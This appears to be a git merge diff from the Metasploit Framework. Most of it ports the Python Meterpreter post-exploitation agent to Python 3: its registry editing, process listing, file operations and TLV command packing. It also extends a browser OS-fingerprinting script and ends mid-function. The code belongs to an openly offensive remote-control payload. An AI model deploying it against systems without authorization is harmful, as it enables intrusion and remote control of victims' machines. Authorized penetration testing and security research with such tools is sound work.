Merge branch 'staging/electro-release' into feature/MSP-9653/use-metasploit-concern-in-pro

MSP-9653

Conflicts:
	Gemfile
	Gemfile.lock

bug/bundler_fix (commit f2a56c041b)
@@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
 #### New Modules
 
 * **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
-* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
 
 #### Library Code
Binary image files changed; contents not shown.
@@ -20,6 +20,7 @@ arch_armle = "armle";
 arch_x86 = "x86";
 arch_x86_64 = "x86_64";
 arch_ppc = "ppc";
+arch_mipsle = "mipsle";
 
 window.os_detect = {};
 

@@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
     } else if (platform.match(/arm/)) {
       // Android and maemo
       arch = arch_armle;
-      if (navigator.userAgent.match(/android/i)) {
-        os_flavor = 'Android';
-      }
+    } else if (platform.match(/x86/)) {
+      arch = arch_x86;
+    } else if (platform.match(/mips/)) {
+      arch = arch_mipsle;
+    }
+
+    if (navigator.userAgent.match(/android/i)) {
+      os_flavor = 'Android';
+    }
     }
     } else if (platform.match(/windows/)) {
       os_name = oses_windows;

Binary file not shown.
@@ -48,6 +48,24 @@ try:
 except ImportError:
     has_winreg = False
 
+try:
+    import winreg
+    has_winreg = True
+except ImportError:
+    has_winreg = (has_winreg or False)
+
+if sys.version_info[0] < 3:
+    is_str = lambda obj: issubclass(obj.__class__, str)
+    is_bytes = lambda obj: issubclass(obj.__class__, str)
+    bytes = lambda *args: str(*args[:1])
+    NULL_BYTE = '\x00'
+else:
+    is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+    is_bytes = lambda obj: issubclass(obj.__class__, bytes)
+    str = lambda x: __builtins__['str'](x, 'UTF-8')
+    NULL_BYTE = bytes('\x00', 'UTF-8')
+    long = int
+
 if has_ctypes:
     #
     # Windows Structures
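The hunk above introduces Python 2/3 compatibility shims (`is_str`, `is_bytes`, `bytes`, `NULL_BYTE`). A quick illustrative sketch, not part of the patch, showing how shims like these let the same byte-handling code run on either interpreter:

```python
# Illustrative only: a minimal version of the is_bytes/NULL_BYTE shim pattern.
import sys

if sys.version_info[0] < 3:
    is_bytes = lambda obj: issubclass(obj.__class__, str)  # Py2 str is already bytes
    NULL_BYTE = '\x00'
else:
    is_bytes = lambda obj: issubclass(obj.__class__, bytes)
    NULL_BYTE = bytes('\x00', 'UTF-8')

def terminate(value):
    # Same code path on both interpreters: value is normalized to bytes first.
    if not is_bytes(value):
        value = value.encode('UTF-8')
    return value + NULL_BYTE

print(terminate('host'))  # b'host\x00' on Python 3, 'host\x00' on Python 2
```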
@@ -498,11 +516,12 @@ def get_stat_buffer(path):
     blocks = si.st_blocks
     st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
     st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
-    st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
+    st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
     st_buf += struct.pack('<II', blksize, blocks)
     return st_buf
 
 def netlink_request(req_type):
+    import select
     # See RFC 3549
     NLM_F_REQUEST = 0x0001
     NLM_F_ROOT = 0x0100
@@ -513,17 +532,25 @@ def netlink_request(req_type):
     sock.bind((os.getpid(), 0))
     seq = int(time.time())
     nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
-    sfd = os.fdopen(sock.fileno(), 'w+b')
-    sfd.write(nlmsg)
+    sock.send(nlmsg)
     responses = []
-    response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
+    if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
+        return responses
+    raw_response_data = sock.recv(0xfffff)
+    response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
+    raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
     while response.type != NLMSG_DONE:
         if response.type == NLMSG_ERROR:
             break
-        response_data = sfd.read(response.len - 16)
+        response_data = raw_response_data[:(response.len - 16)]
         responses.append(response_data)
-        response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
-    sfd.close()
+        raw_response_data = raw_response_data[len(response_data):]
+        if not len(raw_response_data):
+            if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
+                break
+            raw_response_data = sock.recv(0xfffff)
+        response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
+        raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
     sock.close()
     return responses
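The rewritten `netlink_request` above swaps the `os.fdopen` wrapper for `select()` plus `recv()` on the raw netlink socket. A hedged, standalone sketch of that read pattern (Linux only; assumes `socket.AF_NETLINK`/`NETLINK_ROUTE` exist; the constants are standard netlink values and the parsing is simplified to one header per datagram):

```python
# Sketch of the select()+recv() netlink read loop; not the patch's code.
import os, select, socket, struct

NLM_F_REQUEST, NLM_F_ROOT = 0x0001, 0x0100
NLMSG_DONE, RTM_GETLINK = 0x0003, 18

sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
sock.bind((os.getpid(), 0))
# 16-byte nlmsghdr plus 16 bytes of ifinfomsg padding, mirroring the request above
sock.send(struct.pack('IHHIIB15x', 32, RTM_GETLINK, NLM_F_REQUEST | NLM_F_ROOT, 1, 0, socket.AF_UNSPEC))

chunks = []
while select.select([sock.fileno()], [], [], 0.5)[0]:
    data = sock.recv(0xfffff)
    msg_type = struct.unpack('IHHII', data[:16])[1]
    if msg_type == NLMSG_DONE:
        break
    chunks.append(data)
sock.close()
print(len(chunks), 'response buffer(s) read')
```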
@@ -559,7 +586,7 @@ def channel_open_stdapi_fs_file(request, response):
     else:
         fmode = 'rb'
     file_h = open(fpath, fmode)
-    channel_id = meterpreter.add_channel(file_h)
+    channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
     response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
     return ERROR_SUCCESS, response
 

@@ -675,6 +702,7 @@ def stdapi_sys_process_execute(request, response):
             proc_h.stderr = open(os.devnull, 'rb')
         else:
             proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+            proc_h.echo_protection = True
         proc_h.start()
     else:
         proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -693,15 +721,15 @@ def stdapi_sys_process_getpid(request, response):
 
 def stdapi_sys_process_get_processes_via_proc(request, response):
     for pid in os.listdir('/proc'):
-        pgroup = ''
+        pgroup = bytes()
         if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
             continue
-        cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
-        status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
+        cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
+        cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
+        status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
         status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
-        status_data = filter(lambda x: len(x) == 2, status_data)
         status = {}
-        for k, v in status_data:
+        for k, v in filter(lambda x: len(x) == 2, status_data):
             status[k[:-1]] = v.strip()
         ppid = status.get('PPid')
         uid = status.get('Uid').split('\t', 1)[0]
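The `via_proc` handler above decodes `/proc/<pid>/status` into a key/value map before packing the process TLVs. A small standalone sketch of the same parsing step (Linux only, illustrative helper name):

```python
# Illustrative sketch of the /proc/<pid>/status parsing done above (Linux only).
import os

def read_status(pid):
    with open(os.path.join('/proc', str(pid), 'status'), 'rb') as handle:
        text = handle.read().decode('utf-8', 'replace')
    status = {}
    for line in text.split('\n'):
        parts = line.split('\t', 1)
        if len(parts) == 2:
            status[parts[0].rstrip(':')] = parts[1].strip()
    return status

info = read_status(os.getpid())
print(info.get('Name'), info.get('PPid'), info.get('Uid', '').split('\t', 1)[0])
```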
@@ -725,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
 def stdapi_sys_process_get_processes_via_ps(request, response):
     ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
     proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-    ps_output = proc_h.stdout.read()
+    ps_output = str(proc_h.stdout.read())
     ps_output = ps_output.split('\n')
     ps_output.pop(0)
     for process in ps_output:
         process = process.split()
         if len(process) < 4:
             break
-        pgroup = ''
+        pgroup = bytes()
         pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
         pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
         pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])

@@ -793,7 +821,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
         use = ctypes.c_ulong()
         use.value = 0
         ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
-        complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
+        complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
         k32.CloseHandle(tkn_h)
         parch = windll_GetNativeSystemInfo()
         is_wow64 = ctypes.c_ubyte()

@@ -802,7 +830,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
         if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
             if is_wow64.value:
                 parch = PROCESS_ARCH_X86
-        pgroup = ''
+        pgroup = bytes()
         pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
         pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
         pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)

@@ -850,16 +878,18 @@ def stdapi_fs_delete_dir(request, response):
 @meterpreter.register_function
 def stdapi_fs_delete_file(request, response):
     file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-    os.unlink(file_path)
+    if os.path.exists(file_path):
+        os.unlink(file_path)
     return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_file_expand_path(request, response):
     path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
     if has_windll:
+        path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
         path_out = (ctypes.c_char * 4096)()
-        path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
-        result = ''.join(path_out)[:path_out_len]
+        path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
+        result = str(ctypes.string_at(path_out))
    elif path_tlv == '%COMSPEC%':
         result = '/bin/sh'
     elif path_tlv in ['%TEMP%', '%TMP%']:
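The `stdapi_fs_file_expand_path` change above passes writable `create_string_buffer` objects by reference instead of raw Python strings. A Windows-only sketch of that ctypes calling convention (the input path is a made-up example):

```python
# Windows-only sketch of the create_string_buffer()/byref() convention used above
# for ExpandEnvironmentStringsA; the %TEMP% path is purely illustrative.
import ctypes

path_in = ctypes.create_string_buffer(b'%TEMP%\\example.bin')
path_out = (ctypes.c_char * 4096)()
length = ctypes.windll.kernel32.ExpandEnvironmentStringsA(
    ctypes.byref(path_in), ctypes.byref(path_out), ctypes.sizeof(path_out))
if length:
    print(ctypes.string_at(path_out).decode('mbcs', 'replace'))
```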
@@ -912,7 +942,8 @@ def stdapi_fs_md5(request, response):
 @meterpreter.register_function
 def stdapi_fs_mkdir(request, response):
     dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
-    os.mkdir(dir_path)
+    if not os.path.isdir(dir_path):
+        os.mkdir(dir_path)
     return ERROR_SUCCESS, response
 
 @meterpreter.register_function

@@ -965,7 +996,7 @@ def stdapi_fs_stat(request, response):
 
 @meterpreter.register_function
 def stdapi_net_config_get_interfaces(request, response):
-    if hasattr(socket, 'AF_NETLINK'):
+    if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
         interfaces = stdapi_net_config_get_interfaces_via_netlink()
     elif has_osxsc:
         interfaces = stdapi_net_config_get_interfaces_via_osxsc()

@@ -974,7 +1005,7 @@ def stdapi_net_config_get_interfaces(request, response):
     else:
         return ERROR_FAILURE, response
     for iface_info in interfaces:
-        iface_tlv = ''
+        iface_tlv = bytes()
         iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
         iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
         if 'mtu' in iface_info:

@@ -1002,7 +1033,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
         0x0100: 'PROMISC',
         0x1000: 'MULTICAST'
     }
-    iface_flags_sorted = iface_flags.keys()
+    iface_flags_sorted = list(iface_flags.keys())
     # Dictionaries don't maintain order
     iface_flags_sorted.sort()
     interfaces = {}

@@ -1106,7 +1137,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
             hw_addr = hw_addr.replace(':', '')
             hw_addr = hw_addr.decode('hex')
             iface_info['hw_addr'] = hw_addr
-    ifnames = interfaces.keys()
+    ifnames = list(interfaces.keys())
     ifnames.sort()
     for iface_name, iface_info in interfaces.items():
         iface_info['index'] = ifnames.index(iface_name)

@@ -1138,7 +1169,10 @@ def stdapi_net_config_get_interfaces_via_windll():
         iface_info['index'] = AdapterAddresses.u.s.IfIndex
         if AdapterAddresses.PhysicalAddressLength:
             iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
-        iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
+        iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
+        if not is_str(iface_desc):
+            iface_desc = str(iface_desc)
+        iface_info['name'] = iface_desc
         iface_info['mtu'] = AdapterAddresses.Mtu
         pUniAddr = AdapterAddresses.FirstUnicastAddress
         while pUniAddr:

@@ -1174,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
     table_data = ctypes.string_at(table, pdwSize.value)
     entries = struct.unpack('I', table_data[:4])[0]
     table_data = table_data[4:]
-    for i in xrange(entries):
+    for i in range(entries):
         addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
         ifrow = MIB_IFROW()
         ifrow.dwIndex = addrrow.dwIndex
@@ -1244,9 +1278,10 @@ def stdapi_registry_close_key(request, response):
 def stdapi_registry_create_key(request, response):
     root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
     base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+    base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
     permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
     res_key = ctypes.c_void_p()
-    if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
+    if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
         response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
         return ERROR_SUCCESS, response
     return ERROR_FAILURE, response

@@ -1255,18 +1290,20 @@ def stdapi_registry_create_key(request, response):
 def stdapi_registry_delete_key(request, response):
     root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
     base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+    base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
     flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
     if (flags & DELETE_KEY_FLAG_RECURSIVE):
-        result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
+        result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
     else:
-        result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
+        result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
     return result, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_delete_value(request, response):
     root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
     value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
-    result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
+    value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
+    result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
     return result, response
 
 @meterpreter.register_function_windll

@@ -1335,9 +1372,10 @@ def stdapi_registry_load_key(request, response):
 def stdapi_registry_open_key(request, response):
     root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
     base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+    base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
     permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
     handle_id = ctypes.c_void_p()
-    if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+    if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
         response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
         return ERROR_SUCCESS, response
     return ERROR_FAILURE, response

@@ -1367,24 +1405,26 @@ def stdapi_registry_query_class(request, response):
 
 @meterpreter.register_function_windll
 def stdapi_registry_query_value(request, response):
-    REG_SZ = 1
-    REG_DWORD = 4
     hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
     value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+    value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
     value_type = ctypes.c_uint32()
     value_type.value = 0
     value_data = (ctypes.c_ubyte * 4096)()
     value_data_sz = ctypes.c_uint32()
     value_data_sz.value = ctypes.sizeof(value_data)
-    result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
+    result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
     if result == ERROR_SUCCESS:
         response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
-        if value_type.value == REG_SZ:
-            response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
-        elif value_type.value == REG_DWORD:
+        if value_type.value == winreg.REG_SZ:
+            response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
+        elif value_type.value == winreg.REG_DWORD:
             value = value_data[:4]
             value.reverse()
-            value = ''.join(map(chr, value))
+            if sys.version_info[0] < 3:
+                value = ''.join(map(chr, value))
+            else:
+                value = bytes(value)
             response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
         else:
             response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
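The registry hunks above consistently switch to `create_string_buffer`/`byref` for the key and value names passed to advapi32. A Windows-only sketch of that open-and-query pattern (the key and value names are illustrative, not from the patch):

```python
# Windows-only sketch of the RegOpenKeyExA / RegQueryValueExA calling pattern
# used above; key and value names below are just examples.
import ctypes

ERROR_SUCCESS = 0
KEY_READ = 0x20019
HKEY_LOCAL_MACHINE = ctypes.c_void_p(0x80000002)

base_key = ctypes.create_string_buffer(b'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion')
value_name = ctypes.create_string_buffer(b'ProductName')
hkey = ctypes.c_void_p()
if ctypes.windll.advapi32.RegOpenKeyExA(HKEY_LOCAL_MACHINE, ctypes.byref(base_key), 0,
                                        KEY_READ, ctypes.byref(hkey)) == ERROR_SUCCESS:
    value_data = (ctypes.c_ubyte * 4096)()
    value_sz = ctypes.c_uint32(ctypes.sizeof(value_data))
    value_type = ctypes.c_uint32(0)
    if ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0,
                                               ctypes.byref(value_type), value_data,
                                               ctypes.byref(value_sz)) == ERROR_SUCCESS:
        print(ctypes.string_at(value_data))
    ctypes.windll.advapi32.RegCloseKey(hkey)
```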
@@ -1395,9 +1435,10 @@ def stdapi_registry_query_value(request, response):
 def stdapi_registry_set_value(request, response):
     hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
     value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+    value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
     value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
     value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
-    result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
+    result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
     return result, response
 
 @meterpreter.register_function_windll

Binary file not shown.
@@ -1,12 +1,5 @@
 #!/usr/bin/python
 import code
-try:
-    import ctypes
-except:
-    has_windll = False
-else:
-    has_windll = hasattr(ctypes, 'windll')
-
 import os
 import random
 import select
@@ -15,10 +8,30 @@ import struct
 import subprocess
 import sys
 import threading
+import time
+import traceback
+
+try:
+    import ctypes
+except ImportError:
+    has_windll = False
+else:
+    has_windll = hasattr(ctypes, 'windll')
+
+if sys.version_info[0] < 3:
+    is_bytes = lambda obj: issubclass(obj.__class__, str)
+    bytes = lambda *args: str(*args[:1])
+    NULL_BYTE = '\x00'
+else:
+    is_bytes = lambda obj: issubclass(obj.__class__, bytes)
+    str = lambda x: __builtins__['str'](x, 'UTF-8')
+    NULL_BYTE = bytes('\x00', 'UTF-8')
 
 #
 # Constants
 #
+DEBUGGING = False
+
 PACKET_TYPE_REQUEST = 0
 PACKET_TYPE_RESPONSE = 1
 PACKET_TYPE_PLAIN_REQUEST = 10
@@ -100,6 +113,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
 
 EXPORTED_SYMBOLS = {}
+EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
 
 def export(symbol):
     EXPORTED_SYMBOLS[symbol.__name__] = symbol

@@ -107,7 +121,7 @@ def export(symbol):
 
 def generate_request_id():
     chars = 'abcdefghijklmnopqrstuvwxyz'
-    return ''.join(random.choice(chars) for x in xrange(32))
+    return ''.join(random.choice(chars) for x in range(32))
 
 @export
 def inet_pton(family, address):
@@ -125,25 +139,6 @@ def inet_pton(family, address):
         return ''.join(map(chr, lpAddress[8:24]))
     raise Exception('no suitable inet_pton functionality is available')
 
-@export
-def packet_get_tlv(pkt, tlv_type):
-    offset = 0
-    while (offset < len(pkt)):
-        tlv = struct.unpack('>II', pkt[offset:offset+8])
-        if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
-            val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
-            if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-                val = val.split('\x00', 1)[0]
-            elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
-                val = struct.unpack('>I', val)[0]
-            elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-                val = bool(struct.unpack('b', val)[0])
-            elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
-                pass
-            return {'type':tlv[1], 'length':tlv[0], 'value':val}
-        offset += tlv[0]
-    return {}
-
 @export
 def packet_enum_tlvs(pkt, tlv_type = None):
     offset = 0

@@ -152,7 +147,7 @@ def packet_enum_tlvs(pkt, tlv_type = None):
         if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
             val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
             if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-                val = val.split('\x00', 1)[0]
+                val = str(val.split(NULL_BYTE, 1)[0])
             elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
                 val = struct.unpack('>I', val)[0]
             elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
@@ -163,6 +158,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
         offset += tlv[0]
     raise StopIteration()
 
+@export
+def packet_get_tlv(pkt, tlv_type):
+    try:
+        tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
+    except IndexError:
+        return {}
+    return tlv
+
 @export
 def tlv_pack(*args):
     if len(args) == 2:
@@ -170,20 +173,33 @@ def tlv_pack(*args):
     else:
         tlv = args[0]
     data = ""
-    if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-        data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
-    elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+    if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
         data = struct.pack('>III', 12, tlv['type'], tlv['value'])
     elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-        data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
-    elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
-        data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
-    elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
-        data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
-    elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
-        data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+        data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
+    else:
+        value = tlv['value']
+        if not is_bytes(value):
+            value = bytes(value, 'UTF-8')
+        if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+            data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
+        elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+            data = struct.pack('>II', 8 + len(value), tlv['type']) + value
+        elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
+            data = struct.pack('>II', 8 + len(value), tlv['type']) + value
+        elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
+            data = struct.pack('>II', 8 + len(value), tlv['type']) + value
     return data
 
+#@export
+class MeterpreterFile(object):
+    def __init__(self, file_obj):
+        self.file_obj = file_obj
+
+    def __getattr__(self, name):
+        return getattr(self.file_obj, name)
+export(MeterpreterFile)
+
 #@export
 class MeterpreterSocket(object):
     def __init__(self, sock):
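The reworked `tlv_pack` above normalizes every value to bytes before framing it with a big-endian length/type header. A minimal round-trip sketch of that framing (constants trimmed to two meta types for illustration; not the patch's code):

```python
# Minimal TLV pack/enumerate round trip matching the framing handled above.
import struct

TLV_META_TYPE_STRING = (1 << 16)
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1

def tlv_pack_string(tlv_type, value):
    value = value.encode('UTF-8')
    # 8-byte header (length, type), then the value, then a NULL terminator
    return struct.pack('>II', 8 + len(value) + 1, tlv_type) + value + b'\x00'

def tlv_enum(packet):
    offset = 0
    while offset < len(packet):
        length, tlv_type = struct.unpack('>II', packet[offset:offset + 8])
        yield tlv_type, packet[offset + 8:offset + length]
        offset += length

pkt = tlv_pack_string(TLV_TYPE_METHOD, 'core_loadlib') + tlv_pack_string(TLV_TYPE_METHOD, 'stdapi_fs_stat')
for tlv_type, value in tlv_enum(pkt):
    print(hex(tlv_type), value.rstrip(b'\x00').decode())
```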
@@ -208,11 +224,11 @@ class STDProcessBuffer(threading.Thread):
         threading.Thread.__init__(self)
         self.std = std
         self.is_alive = is_alive
-        self.data = ''
+        self.data = bytes()
         self.data_lock = threading.RLock()
 
     def run(self):
-        for byte in iter(lambda: self.std.read(1), ''):
+        for byte in iter(lambda: self.std.read(1), bytes()):
             self.data_lock.acquire()
             self.data += byte
             self.data_lock.release()

@@ -220,15 +236,20 @@ class STDProcessBuffer(threading.Thread):
     def is_read_ready(self):
         return len(self.data) != 0
 
-    def read(self, l = None):
-        data = ''
+    def peek(self, l = None):
+        data = bytes()
         self.data_lock.acquire()
         if l == None:
             data = self.data
-            self.data = ''
         else:
             data = self.data[0:l]
-            self.data = self.data[l:]
+        self.data_lock.release()
+        return data
+
+    def read(self, l = None):
